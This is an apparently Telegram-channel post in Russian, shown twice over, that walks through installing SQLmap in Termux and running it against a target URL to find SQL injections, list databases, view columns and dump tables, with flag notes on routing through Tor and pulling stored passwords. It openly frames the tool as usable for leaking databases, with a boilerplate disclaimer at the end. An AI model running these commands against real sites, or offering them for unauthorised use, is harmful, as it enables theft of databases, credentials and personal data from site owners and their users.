🤩 Дампим БД через SQLmap
👀 SQLmap - софтина для поиска и слива баз данных. Так то она создана для пентеста, но и в плохих действиях ее можно использовать.
🌐 По факту она просто ищет и пробует SQL - инъекции, для извлечения данных и пытается захватить удаленный доступ.
🕹 Инструкции:
apt update && upgrade
apt install git
apt install python2
git clone https://github.com/sqlmapproject/sqlmap
cd sqlmap
— Сейчас мы просто скачали софт, теперь немного про команды
python2 sqlmap.py -u "URL" —dbs
— Пишем без кавычек
python2 sqlmap.py -u "URL" —dbs —risk(1/3)/level(1/5)
— Риск и level отвечают за глубину поиска. Делает то же самое, что и первая команда, но глубже.
📍 Для просмотра БД:
python2 sqlmap.py -u "URL" -D "название БД" -T "название таб." —columns
📍 Для скачивания БД:
python2 sqlmap.py -u "URL" -D "название БД" -T "название таб." —dump
Ключи и что они делают🗣
⏺u - для URL
⏺tor - для использования защищенного канала
⏺dbs - доступные базы
⏺table - смотрим таблицу
⏺columns - просмотр колонок
⏺dump - скачивание БД
⏺current-user - информация о БД
⏺passwords - сохраненные пароли в базе
⏺level - для определения глубины проверки. 1 - база, 5 - максимум.
‼️ Автор статьи никого не призывает к правонарушениям и отказывается нести ответственность за ваши действия. Вся информация предоставлена исключительно в ознакомительных целях. Спасибо!
🗂 Меню канала | #ПЕНТЕСТ | #TERMUX
👀 SQLmap - софтина для поиска и слива баз данных. Так то она создана для пентеста, но и в плохих действиях ее можно использовать.
🌐 По факту она просто ищет и пробует SQL - инъекции, для извлечения данных и пытается захватить удаленный доступ.
🕹 Инструкции:
apt update && upgrade
apt install git
apt install python2
git clone https://github.com/sqlmapproject/sqlmap
cd sqlmap
— Сейчас мы просто скачали софт, теперь немного про команды
python2 sqlmap.py -u "URL" —dbs
— Пишем без кавычек
python2 sqlmap.py -u "URL" —dbs —risk(1/3)/level(1/5)
— Риск и level отвечают за глубину поиска. Делает то же самое, что и первая команда, но глубже.
📍 Для просмотра БД:
python2 sqlmap.py -u "URL" -D "название БД" -T "название таб." —columns
📍 Для скачивания БД:
python2 sqlmap.py -u "URL" -D "название БД" -T "название таб." —dump
Ключи и что они делают🗣
⏺u - для URL
⏺tor - для использования защищенного канала
⏺dbs - доступные базы
⏺table - смотрим таблицу
⏺columns - просмотр колонок
⏺dump - скачивание БД
⏺current-user - информация о БД
⏺passwords - сохраненные пароли в базе
⏺level - для определения глубины проверки. 1 - база, 5 - максимум.
‼️ Автор статьи никого не призывает к правонарушениям и отказывается нести ответственность за ваши действия. Вся информация предоставлена исключительно в ознакомительных целях. Спасибо!
🗂 Меню канала | #ПЕНТЕСТ | #TERMUX